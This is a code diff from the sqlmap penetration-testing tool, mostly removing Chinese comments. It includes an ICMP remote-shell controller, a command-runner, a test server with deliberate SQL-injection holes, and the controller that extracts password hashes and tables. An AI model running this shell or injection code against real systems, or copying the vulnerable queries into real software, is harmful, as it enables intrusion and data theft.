                    if len(data) > 0:
-                        sys.stdout.write(data)  # 输出接收到的数据
+                        sys.stdout.write(data)

-                    # 从标准输入读取命令
+                    # Parse command from standard input
                    try:
-                        cmd = sys.stdin.readline()  # 读取用户输入的命令
+                        cmd = sys.stdin.readline()
                    except:
                        pass

-                    if cmd == 'exit\n':  # 如果输入为 'exit'，退出循环
+                    if cmd == 'exit\n':
                        return

-                    # 设置序列号和标识符，以便回复
+                    # Set sequence number and identifier
                    icmp.set_icmp_id(ident)
                    icmp.set_icmp_seq(seq_id)

-                    # 将命令作为数据包含在 ICMP 包中
+                    # Include the command as data inside the ICMP packet
                    icmp.contains(ImpactPacket.Data(cmd))

-                    # 计算 ICMP 包的校验和
+                    # Calculate its checksum
                    icmp.set_icmp_cksum(0)
-                    icmp.auto_checksum = 1  # 自动计算校验和
+                    icmp.auto_checksum = 1

-                    # 将 ICMP 包插入到 IP 包中
+                    # Have the IP packet contain the ICMP packet (along with its payload)
                    ip.contains(icmp)

                    try:
-                        # 发送数据包到目标主机
+                        # Send it to the target host
                        sock.sendto(ip.get_packet(), (dst, 0))
                    except socket.error as ex:
-                        sys.stderr.write("'%s'\n" % ex)  # 输出错误信息
+                        sys.stderr.write("'%s'\n" % ex)
                        sys.stderr.flush()
        except:
            break

 if __name__ == '__main__':
-    # 检查参数，确保提供了源 IP 和目标 IP
    if len(sys.argv) < 3:
        msg = 'missing mandatory options. Execute as root:\n'
        msg += './icmpsh-m.py <source IP address> <destination IP address>\n'
        sys.stderr.write(msg)
        sys.exit(1)

-    main(sys.argv[1], sys.argv[2])  # 调用主函数，传入源和目标 IP
+    main(sys.argv[1], sys.argv[2])
--- a/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.cpp
+++ b/src/sqlmap-master/extra/runcmd/src/runcmd/runcmd.cpp
@ -2,7 +2,7 @@
 	runcmd - a program for running command prompt commands
 	Copyright (C) 2010 Miroslav Stampar
 	email: miroslav.stampar@gmail.com
-
+	
 	This library is free software; you can redistribute it and/or
 	modify it under the terms of the GNU Lesser General Public
 	License as published by the Free Software Foundation; either
@ -25,27 +25,22 @@
 #include <string>

 using namespace std;
-
 int main(int argc, char* argv[])
 {
-  FILE *fp; 
-  string cmd; 
+  FILE *fp;
+  string cmd;

-  // 从命令行参数获取命令并构建完整的命令字符串
-  for (int count = 1; count < argc; count++)
-    cmd += " " + string(argv[count]); // 将每个参数添加到 cmd 字符串中，并用空格分隔
+  for( int count = 1; count < argc; count++ )
+	cmd += " " + string(argv[count]);

-  // 使用 _popen() 函数以只读的方式打开一个命令进程
  fp = _popen(cmd.c_str(), "r");

-  // 检查文件指针是否有效
  if (fp != NULL) {
-    char buffer[BUFSIZ]; // 声明一个缓冲区用于接收输出
+    char buffer[BUFSIZ];

-    // 读取命令的输出并将其写到标准输出
    while (fgets(buffer, sizeof buffer, fp) != NULL)
-      fputs(buffer, stdout); // 将缓冲区的内容输出到控制台
+      fputs(buffer, stdout);
  }

  return 0;
-}
+}
--- a/src/sqlmap-master/extra/shutils/duplicates.py
+++ b/src/sqlmap-master/extra/shutils/duplicates.py
@ -3,32 +3,28 @@
 # Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission

-# Removes duplicate entries in wordlist-like files
+# Removes duplicate entries in wordlist like files

-from __future__ import print_function  # 确保使用 Python 3 的 print() 函数
+from __future__ import print_function

-import sys  # 导入系统模块，用于处理命令行参数和文件操作
+import sys

 if __name__ == "__main__":
-    # 检查程序是否接收到至少一个命令行参数
    if len(sys.argv) > 1:
-        items = list()  # 初始化一个列表用于存储唯一条目
+        items = list()

-        # 打开指定的文件进行读取
        with open(sys.argv[1], 'r') as f:
-            for item in f:  # 遍历文件中的每一行
-                item = item.strip()  # 去掉行首尾的空白字符
-
+            for item in f:
+                item = item.strip()
                try:
-                    str.encode(item)  # 尝试对字符串编码，确保内容是有效的字符串
-                    if item in items:  # 检查条目是否已经在列表中
-                        if item:  # 确保条目不为空
-                            print(item)  # 打印重复的条目
+                    str.encode(item)
+                    if item in items:
+                        if item:
+                            print(item)
                    else:
-                        items.append(item)  # 如果条目不在列表中，则添加到列表
+                        items.append(item)
                except:
-                    pass  # 捕获异常，继续处理下一个条目
+                    pass

-        # 以写入模式打开同一个文件，准备写入去重后的唯一条目
        with open(sys.argv[1], 'w+') as f:
-            f.writelines("\n".join(items))  # 将唯一条目写回文件，以换行符分隔
+            f.writelines("\n".join(items))
--- a/src/sqlmap-master/extra/shutils/newlines.py
+++ b/src/sqlmap-master/extra/shutils/newlines.py
@ -6,30 +6,25 @@ import os
 import sys

 def check(filepath):
-    # 检查给定路径的文件
-    if filepath.endswith(".py"):  # 检查文件扩展名是否为 .py
-        content = open(filepath, "rb").read()  # 以二进制模式打开文件并读取全部内容
-        pattern = "\n\n\n".encode("ascii")  # 定义一个二进制模式的换行符序列，表示三个换行符
+    if filepath.endswith(".py"):
+        content = open(filepath, "rb").read()
+        pattern = "\n\n\n".encode("ascii")

-        # 检查内容中是否包含三个连续的换行符
        if pattern in content:
-            index = content.find(pattern)  # 找到模式在内容中的第一个出现位置
-            # 打印文件路径和模式前后各 30 个字节的内容
+            index = content.find(pattern)
            print(filepath, repr(content[index - 30:index + 30]))

 if __name__ == "__main__":
    try:
-        BASE_DIRECTORY = sys.argv[1]  # 尝试获取命令行中指定的目录路径
-    except IndexError:  # 如果没有指定目录参数
+        BASE_DIRECTORY = sys.argv[1]
+    except IndexError:
        print("no directory specified, defaulting to current working directory")
-        BASE_DIRECTORY = os.getcwd()  # 使用当前工作目录作为默认目录
+        BASE_DIRECTORY = os.getcwd()

    print("looking for *.py scripts in subdirectories of '%s'" % BASE_DIRECTORY)
-    # 遍历指定目录及其子目录中的所有文件
    for root, dirs, files in os.walk(BASE_DIRECTORY):
-        # 如果路径中包含 "extra" 或 "thirdparty"，则跳过该目录
        if any(_ in root for _ in ("extra", "thirdparty")):
            continue
-        for name in files:  # 遍历文件列表
-            filepath = os.path.join(root, name)  # 构建文件的完整路径
-            check(filepath)  # 调用 check 函数检查该文件
+        for name in files:
+            filepath = os.path.join(root, name)
+            check(filepath)
--- a/src/sqlmap-master/extra/vulnserver/vulnserver.py
+++ b/src/sqlmap-master/extra/vulnserver/vulnserver.py
@ -6,9 +6,6 @@ vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes)
 Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
-# 该脚本实现了一个简单的 HTTP 服务器，故意留下 SQL 注入漏洞，供测试和学习之用。
-# 它展示了基本的 Web 服务器如何处理请求、解析参数以及如何与 SQLite 数据库交互。
-# 此类工具应仅在安全的实验环境中使用，以避免滥用和安全风险。在实际应用中，开发者应注意保护数据库查询以防止 SQL 注入攻击。

 from __future__ import print_function

@ -20,26 +17,29 @@ import sys
 import threading
 import traceback

-# 检查 Python 版本
 PY3 = sys.version_info >= (3, 0)
-UNICODE_ENCODING = "utf-8"  # 定义 Unicode 编码
-DEBUG = False  # 调试模式标志
+UNICODE_ENCODING = "utf-8"
+DEBUG = False

 if PY3:
-    # 导入 Python 3 中的 HTTP 相关模块
-    from http.client import INTERNAL_SERVER_ERROR, NOT_FOUND, OK
-    from http.server import BaseHTTPRequestHandler, HTTPServer
+    from http.client import INTERNAL_SERVER_ERROR
+    from http.client import NOT_FOUND
+    from http.client import OK
+    from http.server import BaseHTTPRequestHandler
+    from http.server import HTTPServer
    from socketserver import ThreadingMixIn
-    from urllib.parse import parse_qs, unquote_plus
+    from urllib.parse import parse_qs
+    from urllib.parse import unquote_plus
 else:
-    # 对于 Python 2，导入相应的 HTTP 相关模块
-    from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
-    from httplib import INTERNAL_SERVER_ERROR, NOT_FOUND, OK
+    from BaseHTTPServer import BaseHTTPRequestHandler
+    from BaseHTTPServer import HTTPServer
+    from httplib import INTERNAL_SERVER_ERROR
+    from httplib import NOT_FOUND
+    from httplib import OK
    from SocketServer import ThreadingMixIn
    from urlparse import parse_qs
    from urllib import unquote_plus

-# SQLite 模式定义，创建用户表并插入示例数据
 SCHEMA = """
    CREATE TABLE users (
        id INTEGER,
@ -54,11 +54,9 @@ SCHEMA = """
    INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull');
 """

-# 定义监听地址和端口
 LISTEN_ADDRESS = "localhost"
 LISTEN_PORT = 8440

-# 全局变量
 _conn = None
 _cursor = None
 _lock = None
@ -70,15 +68,13 @@ def init(quiet=False):
    global _cursor
    global _lock

-    # 在内存中创建 SQLite 数据库连接
    _conn = sqlite3.connect(":memory:", isolation_level=None, check_same_thread=False)
-    _cursor = _conn.cursor()  # 创建游标，用于执行 SQL 命令
-    _lock = threading.Lock()  # 创建线程锁，以处理多线程环境下的数据库访问
+    _cursor = _conn.cursor()
+    _lock = threading.Lock()

-    _cursor.executescript(SCHEMA)  # 执行脚本以创建表并插入数据
+    _cursor.executescript(SCHEMA)

    if quiet:
-        # 如果 quiet 为 True，则禁止输出
        global print

        def _(*args, **kwargs):
@ -87,7 +83,6 @@ def init(quiet=False):
        print = _

 class ThreadingServer(ThreadingMixIn, HTTPServer):
-    # 允许多线程处理 HTTP 请求
    def finish_request(self, *args, **kwargs):
        try:
            HTTPServer.finish_request(self, *args, **kwargs)
@ -96,16 +91,13 @@ class ThreadingServer(ThreadingMixIn, HTTPServer):
                traceback.print_exc()

 class ReqHandler(BaseHTTPRequestHandler):
-    # 请求处理类
    def do_REQUEST(self):
-        # 处理请求，分割路径和查询字符串
        path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
        params = {}

        if query:
-            params.update(parse_qs(query))  # 解析查询字符串为字典
+            params.update(parse_qs(query))

-            # 检查是否出现恶意脚本
            if "<script>" in unquote_plus(query):
                self.send_response(INTERNAL_SERVER_ERROR)
                self.send_header("X-Powered-By", "Express")
@ -114,25 +106,18 @@ class ReqHandler(BaseHTTPRequestHandler):
                self.wfile.write("CLOUDFLARE_ERROR_500S_BOX".encode(UNICODE_ENCODING))
                return

-        # 处理请求数据（如果有）
        if hasattr(self, "data"):
            if self.data.startswith('{') and self.data.endswith('}'):
-                params.update(json.loads(self.data))  # JSON 数据
+                params.update(json.loads(self.data))
            elif self.data.startswith('<') and self.data.endswith('>'):
-                # 解析 HTML 表单数据
-                params.update(dict((_[0], _[1].replace("&apos;", "'").replace("&quot;", '"')
-                                    .replace("&lt;", '<').replace("&gt;", '>').replace("&amp;", '&'))
-                                   for _ in re.findall(r'name="([^"]+)" value="([^"]*)"', self.data)))
+                params.update(dict((_[0], _[1].replace("&apos;", "'").replace("&quot;", '"').replace("&lt;", '<').replace("&gt;", '>').replace("&amp;", '&')) for _ in re.findall(r'name="([^"]+)" value="([^"]*)"', self.data)))
            else:
-                # 处理 URL 编码数据
-                self.data = self.data.replace(';', '&')  # 兼容性处理
+                self.data = self.data.replace(';', '&')     # Note: seems that Python3 started ignoring parameter splitting with ';'
                params.update(parse_qs(self.data))

-        # 处理请求头参数
        for name in self.headers:
            params[name.lower()] = self.headers[name]

-        # 处理 Cookie 参数
        if "cookie" in params:
            for part in params["cookie"].split(';'):
                part = part.strip()
@ -140,17 +125,14 @@ class ReqHandler(BaseHTTPRequestHandler):
                    name, value = part.split('=', 1)
                    params[name.strip()] = unquote_plus(value.strip())

-        # 将多值参数转换为单值
        for key in params:
            if params[key] and isinstance(params[key], (tuple, list)):
                params[key] = params[key][-1]

-        self.url, self.params = path, params  # 存储 URL 和参数
+        self.url, self.params = path, params

        if self.url == '/':
-            # 主页处理
            if not any(_ in self.params for _ in ("id", "query")):
-                # 如果没有 ID 或查询参数，则显示主页面
                self.send_response(OK)
                self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING)
                self.send_header("Connection", "close")
@ -160,33 +142,27 @@ class ReqHandler(BaseHTTPRequestHandler):
                code, output = OK, ""

                try:
-                    # 处理回显参数
                    if self.params.get("echo", ""):
                        output += "%s<br>" % self.params["echo"]

                    if self.params.get("reflect", ""):
                        output += "%s<br>" % self.params.get("id")

-                    with _lock:  # 使用锁来确保线程安全
+                    with _lock:
                        if "query" in self.params:
-                            # 执行任意 SQL 查询
                            _cursor.execute(self.params["query"])
                        elif "id" in self.params:
-                            # 通过 ID 查询用户
                            if "base64" in self.params:
-                                _cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" %
-                                                base64.b64decode("%s===" % self.params["id"],
-                                                altchars=self.params.get("altchars")).decode())
+                                _cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" % base64.b64decode("%s===" % self.params["id"], altchars=self.params.get("altchars")).decode())
                            else:
                                _cursor.execute("SELECT * FROM users WHERE id=%s LIMIT 0, 1" % self.params["id"])
-                        results = _cursor.fetchall()  # 获取查询结果
+                        results = _cursor.fetchall()

                    output += "<b>SQL results:</b><br>\n"

-                    # 根据查询结果决定响应的状态码和内容
                    if self.params.get("code", ""):
                        if not results:
-                            code = INTERNAL_SERVER_ERROR  # 出错
+                            code = INTERNAL_SERVER_ERROR
                    else:
                        if results:
                            output += "<table border=\"1\">\n"
@ -199,16 +175,15 @@ class ReqHandler(BaseHTTPRequestHandler):

                            output += "</table>\n"
                        else:
-                            output += "no results found"  # 查询无结果
+                            output += "no results found"

                    output += "</body></html>"
                except Exception as ex:
                    code = INTERNAL_SERVER_ERROR
-                    # 捕获异常并返回错误信息
                    output = "%s: %s" % (re.search(r"'([^']+)'", str(type(ex))).group(1), ex)

-                # 发送响应
                self.send_response(code)
+
                self.send_header("Content-type", "text/html")
                self.send_header("Connection", "close")

@ -219,30 +194,26 @@ class ReqHandler(BaseHTTPRequestHandler):
                    self.end_headers()
                    self.wfile.write(output if isinstance(output, bytes) else output.encode(UNICODE_ENCODING))
        else:
-            # 对于未定义的路径返回 404
            self.send_response(NOT_FOUND)
            self.send_header("Connection", "close")
            self.end_headers()

    def do_GET(self):
-        self.do_REQUEST()  # 处理 GET 请求
+        self.do_REQUEST()

    def do_PUT(self):
-        self.do_POST()  # 处理 PUT 请求
+        self.do_POST()

    def do_HEAD(self):
-        self.do_REQUEST()  # 处理 HEAD 请求
+        self.do_REQUEST()

    def do_POST(self):
-        # 处理 POST 请求
        length = int(self.headers.get("Content-length", 0))
        if length:
-            # 读取请求体数据
            data = self.rfile.read(length)
            data = unquote_plus(data.decode(UNICODE_ENCODING, "ignore"))
            self.data = data
        elif self.headers.get("Transfer-encoding") == "chunked":
-            # 处理 chunked 请求
            data, line = b"", b""
            count = 0

@ -261,10 +232,10 @@ class ReqHandler(BaseHTTPRequestHandler):

            self.data = data.decode(UNICODE_ENCODING, "ignore")

-        self.do_REQUEST()  # 处理 POST 逻辑
+        self.do_REQUEST()

    def log_message(self, format, *args):
-        return  # 不记录日志
+        return

 def run(address=LISTEN_ADDRESS, port=LISTEN_PORT):
    global _alive
@ -273,17 +244,16 @@ def run(address=LISTEN_ADDRESS, port=LISTEN_PORT):
        _alive = True
        _server = ThreadingServer((address, port), ReqHandler)
        print("[i] running HTTP server at 'http://%s:%d'" % (address, port))
-        _server.serve_forever()  # 开始监听并处理请求
+        _server.serve_forever()
    except KeyboardInterrupt:
-        _server.socket.close()  # 关闭服务器
+        _server.socket.close()
        raise
    finally:
        _alive = False

 if __name__ == "__main__":
    try:
-        init()  # 初始化数据库和服务器
-        run(sys.argv[1] if len(sys.argv) > 1 else LISTEN_ADDRESS,
-            int(sys.argv[2] if len(sys.argv) > 2 else LISTEN_PORT))
+        init()
+        run(sys.argv[1] if len(sys.argv) > 1 else LISTEN_ADDRESS, int(sys.argv[2] if len(sys.argv) > 2 else LISTEN_PORT))
    except KeyboardInterrupt:
-        print("\r[x] Ctrl-C received")  # 捕获 Ctrl-C 终止信号
+        print("\r[x] Ctrl-C received")
--- a/src/sqlmap-master/lib/class_diagram/blind_classes_blind.png
+++ b/src/sqlmap-master/lib/class_diagram/blind_classes_blind.png
--- a/src/sqlmap-master/lib/class_diagram/blind_packages_blind.png
+++ b/src/sqlmap-master/lib/class_diagram/blind_packages_blind.png
--- a/src/sqlmap-master/lib/class_diagram/controller_classes_controller.png
+++ b/src/sqlmap-master/lib/class_diagram/controller_classes_controller.png
--- a/src/sqlmap-master/lib/class_diagram/controller_packages_controller.png
+++ b/src/sqlmap-master/lib/class_diagram/controller_packages_controller.png
--- a/src/sqlmap-master/lib/class_diagram/core_classes_core.png
+++ b/src/sqlmap-master/lib/class_diagram/core_classes_core.png
--- a/src/sqlmap-master/lib/class_diagram/core_packages_core.png
+++ b/src/sqlmap-master/lib/class_diagram/core_packages_core.png
--- a/src/sqlmap-master/lib/class_diagram/dns_classes_dns.png
+++ b/src/sqlmap-master/lib/class_diagram/dns_classes_dns.png
--- a/src/sqlmap-master/lib/class_diagram/dns_packages_dns.png
+++ b/src/sqlmap-master/lib/class_diagram/dns_packages_dns.png
--- a/src/sqlmap-master/lib/class_diagram/error_classes_error.png
+++ b/src/sqlmap-master/lib/class_diagram/error_classes_error.png
--- a/src/sqlmap-master/lib/class_diagram/error_packages_error.png
+++ b/src/sqlmap-master/lib/class_diagram/error_packages_error.png
--- a/src/sqlmap-master/lib/class_diagram/parse_classes_parse.png
+++ b/src/sqlmap-master/lib/class_diagram/parse_classes_parse.png
--- a/src/sqlmap-master/lib/class_diagram/parse_packages_parse.png
+++ b/src/sqlmap-master/lib/class_diagram/parse_packages_parse.png
--- a/src/sqlmap-master/lib/class_diagram/request_classes_request.png
+++ b/src/sqlmap-master/lib/class_diagram/request_classes_request.png
--- a/src/sqlmap-master/lib/class_diagram/request_packages_request.png
+++ b/src/sqlmap-master/lib/class_diagram/request_packages_request.png
--- a/src/sqlmap-master/lib/class_diagram/takeover_classes_takeover.png
+++ b/src/sqlmap-master/lib/class_diagram/takeover_classes_takeover.png
--- a/src/sqlmap-master/lib/class_diagram/takeover_packages_takeover.png
+++ b/src/sqlmap-master/lib/class_diagram/takeover_packages_takeover.png
--- a/src/sqlmap-master/lib/class_diagram/techniques_classes_techniques.png
+++ b/src/sqlmap-master/lib/class_diagram/techniques_classes_techniques.png
--- a/src/sqlmap-master/lib/class_diagram/techniques_packages_techniques.png
+++ b/src/sqlmap-master/lib/class_diagram/techniques_packages_techniques.png
--- a/src/sqlmap-master/lib/class_diagram/union_classes_union.png
+++ b/src/sqlmap-master/lib/class_diagram/union_classes_union.png
--- a/src/sqlmap-master/lib/class_diagram/union_packages_union.png
+++ b/src/sqlmap-master/lib/class_diagram/union_packages_union.png
--- a/src/sqlmap-master/lib/class_diagram/utils_classes_utils.png
+++ b/src/sqlmap-master/lib/class_diagram/utils_classes_utils.png
--- a/src/sqlmap-master/lib/class_diagram/utils_packages_utils.png
+++ b/src/sqlmap-master/lib/class_diagram/utils_packages_utils.png
--- a/src/sqlmap-master/lib/controller/action.py
+++ b/src/sqlmap-master/lib/controller/action.py
@ -1,243 +1,247 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)  
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-from lib.controller.handler import setHandler  # 从 handler 模块导入 setHandler 函数
-from lib.core.common import Backend  # 从 common 模块导入 Backend 类
-from lib.core.common import Format  # 从 common 模块导入 Format 类
-from lib.core.data import conf  # 从 data 模块导入 conf 对象
-from lib.core.data import kb  # 从 data 模块导入 kb 对象
-from lib.core.data import logger  # 从 data 模块导入 logger 对象
-from lib.core.data import paths  # 从 data 模块导入 paths 对象
-from lib.core.enums import CONTENT_TYPE  # 从 enums 模块导入 CONTENT_TYPE 枚举类
-from lib.core.exception import SqlmapNoneDataException  # 从 exception 模块导入 SqlmapNoneDataException 类
-from lib.core.exception import SqlmapUnsupportedDBMSException  # 从 exception 模块导入 SqlmapUnsupportedDBMSException 类
-from lib.core.settings import SUPPORTED_DBMS  # 从 settings 模块导入 SUPPORTED_DBMS 列表
-from lib.utils.brute import columnExists  # 从 brute 模块导入 columnExists 函数
-from lib.utils.brute import fileExists  # 从 brute 模块导入 fileExists 函数
-from lib.utils.brute import tableExists  # 从 brute 模块导入 tableExists 函数
+from lib.controller.handler import setHandler
+from lib.core.common import Backend
+from lib.core.common import Format
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import paths
+from lib.core.enums import CONTENT_TYPE
+from lib.core.exception import SqlmapNoneDataException
+from lib.core.exception import SqlmapUnsupportedDBMSException
+from lib.core.settings import SUPPORTED_DBMS
+from lib.utils.brute import columnExists
+from lib.utils.brute import fileExists
+from lib.utils.brute import tableExists

 def action():
    """
-    该函数利用受影响的 URL 参数上的 SQL 注入漏洞，并从后端数据库管理系统或操作系统中提取请求的数据（如果可能）。
+    This function exploit the SQL injection on the affected
+    URL parameter and extract requested data from the
+    back-end database management system or operating system
+    if possible
    """

-    # 首先，我们需要识别后端数据库管理系统，才能继续注入操作
-    setHandler()  # 设置数据库处理程序
+    # First of all we have to identify the back-end database management
+    # system to be able to go ahead with the injection
+    setHandler()

-    if not Backend.getDbms() or not conf.dbmsHandler:  # 如果无法识别数据库或没有对应的数据库处理程序
-        htmlParsed = Format.getErrorParsedDBMSes()  # 解析 HTML 错误页面以识别数据库
+    if not Backend.getDbms() or not conf.dbmsHandler:
+        htmlParsed = Format.getErrorParsedDBMSes()

-        errMsg = "sqlmap was not able to fingerprint the "  # 错误信息
+        errMsg = "sqlmap was not able to fingerprint the "
        errMsg += "back-end database management system"

-        if htmlParsed:  # 如果从 HTML 错误页面解析到了数据库信息
+        if htmlParsed:
            errMsg += ", but from the HTML error page it was "
            errMsg += "possible to determinate that the "
            errMsg += "back-end DBMS is %s" % htmlParsed

-        if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:  # 如果解析到的数据库在支持的数据库列表中
+        if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
            errMsg += ". Do not specify the back-end DBMS manually, "
            errMsg += "sqlmap will fingerprint the DBMS for you"
-        elif kb.nullConnection:  # 如果是使用 null connection 模式
+        elif kb.nullConnection:
            errMsg += ". You can try to rerun without using optimization "
            errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection")

-        raise SqlmapUnsupportedDBMSException(errMsg)  # 抛出不支持的数据库管理系统异常
+        raise SqlmapUnsupportedDBMSException(errMsg)

-    conf.dumper.singleString(conf.dbmsHandler.getFingerprint())  # 打印识别到的数据库指纹
+    conf.dumper.singleString(conf.dbmsHandler.getFingerprint())

-    kb.fingerprinted = True  # 设置已识别数据库指纹
+    kb.fingerprinted = True

-    # 枚举选项
-    if conf.getBanner:  # 如果需要获取数据库版本信息
-        conf.dumper.banner(conf.dbmsHandler.getBanner())  # 打印数据库版本信息
+    # Enumeration options
+    if conf.getBanner:
+        conf.dumper.banner(conf.dbmsHandler.getBanner())

-    if conf.getCurrentUser:  # 如果需要获取当前用户
-        conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())  # 打印当前用户
+    if conf.getCurrentUser:
+        conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())

-    if conf.getCurrentDb:  # 如果需要获取当前数据库
-        conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())  # 打印当前数据库
+    if conf.getCurrentDb:
+        conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())

-    if conf.getHostname:  # 如果需要获取数据库主机名
-        conf.dumper.hostname(conf.dbmsHandler.getHostname())  # 打印数据库主机名
+    if conf.getHostname:
+        conf.dumper.hostname(conf.dbmsHandler.getHostname())

-    if conf.isDba:  # 如果需要判断当前用户是否为 DBA
-        conf.dumper.dba(conf.dbmsHandler.isDba())  # 打印判断结果
+    if conf.isDba:
+        conf.dumper.dba(conf.dbmsHandler.isDba())

-    if conf.getUsers:  # 如果需要获取所有用户
-        conf.dumper.users(conf.dbmsHandler.getUsers())  # 打印所有用户
+    if conf.getUsers:
+        conf.dumper.users(conf.dbmsHandler.getUsers())

-    if conf.getStatements:  # 如果需要获取数据库中的所有 SQL 语句
-        conf.dumper.statements(conf.dbmsHandler.getStatements())  # 打印所有 SQL 语句
+    if conf.getStatements:
+        conf.dumper.statements(conf.dbmsHandler.getStatements())

-    if conf.getPasswordHashes:  # 如果需要获取用户密码哈希
+    if conf.getPasswordHashes:
        try:
-            conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)  # 打印用户密码哈希
+            conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.getPrivileges:  # 如果需要获取用户权限
+    if conf.getPrivileges:
        try:
-            conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)  # 打印用户权限
+            conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.getRoles:  # 如果需要获取用户角色
+    if conf.getRoles:
        try:
-            conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)  # 打印用户角色
+            conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.getDbs:  # 如果需要获取所有数据库
+    if conf.getDbs:
        try:
-            conf.dumper.dbs(conf.dbmsHandler.getDbs())  # 打印所有数据库
+            conf.dumper.dbs(conf.dbmsHandler.getDbs())
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.getTables:  # 如果需要获取数据库中的所有表
+    if conf.getTables:
        try:
-            conf.dumper.dbTables(conf.dbmsHandler.getTables())  # 打印所有表
+            conf.dumper.dbTables(conf.dbmsHandler.getTables())
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.commonTables:  # 如果需要获取一些常见的表
+    if conf.commonTables:
        try:
-            conf.dumper.dbTables(tableExists(paths.COMMON_TABLES))  # 打印常见的表
+            conf.dumper.dbTables(tableExists(paths.COMMON_TABLES))
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.getSchema:  # 如果需要获取数据库架构信息
+    if conf.getSchema:
        try:
-            conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA)  # 打印数据库架构信息
+            conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA)
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.getColumns:  # 如果需要获取数据库中的所有列
+    if conf.getColumns:
        try:
-            conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS)  # 打印所有列
+            conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS)
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.getCount:  # 如果需要获取表中的数据行数
+    if conf.getCount:
        try:
-            conf.dumper.dbTablesCount(conf.dbmsHandler.getCount())  # 打印数据行数
+            conf.dumper.dbTablesCount(conf.dbmsHandler.getCount())
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.commonColumns:  # 如果需要获取一些常见的列
+    if conf.commonColumns:
        try:
-            conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS))  # 打印常见的列
+            conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS))
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.dumpTable:  # 如果需要导出表中的数据
+    if conf.dumpTable:
        try:
-            conf.dbmsHandler.dumpTable()  # 导出表中的数据
+            conf.dbmsHandler.dumpTable()
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.dumpAll:  # 如果需要导出数据库中的所有数据
+    if conf.dumpAll:
        try:
-            conf.dbmsHandler.dumpAll()  # 导出数据库中的所有数据
+            conf.dbmsHandler.dumpAll()
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.search:  # 如果需要在数据库中搜索数据
+    if conf.search:
        try:
-            conf.dbmsHandler.search()  # 在数据库中搜索数据
+            conf.dbmsHandler.search()
        except SqlmapNoneDataException as ex:
-            logger.critical(ex)  # 打印错误信息
+            logger.critical(ex)
        except:
-            raise  # 抛出其他异常
+            raise

-    if conf.sqlQuery:  # 如果需要执行 SQL 查询
